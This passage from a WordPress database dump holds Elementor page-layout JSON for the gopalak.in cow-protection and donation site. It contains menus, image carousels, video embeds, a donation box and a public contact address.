o.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11020,1832,'_elementor_page_assets','a:0:{}'),(11023,1833,'_edit_lock','1665987566:1'),(11024,1833,'_edit_last','1'),(11025,1833,'_elementor_edit_mode','builder'),(11026,1833,'_elementor_template_type','wp-page'),(11027,1833,'_elementor_version','3.7.8'),(11028,1833,'_wp_page_template','elementor_canvas'),(11029,1833,'_elementor_data','[]'),(11030,1833,'_elementor_page_assets','a:0:{}'),(11050,1839,'_elementor_edit_mode','builder'),(11051,1839,'_elementor_template_type','wp-page'),(11052,1839,'_elementor_version','3.7.8'),(11053,1839,'_wp_page_template','elementor_canvas'),(11054,1839,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\\n\\n\\n\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11055,1839,'_elementor_page_assets','a:0:{}'),(11057,1840,'_elementor_edit_mode','builder'),(11058,1840,'_elementor_template_type','wp-page'),(11059,1840,'_elementor_version','3.7.8'),(11060,1840,'_wp_page_template','elementor_canvas'),(11061,1840,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My 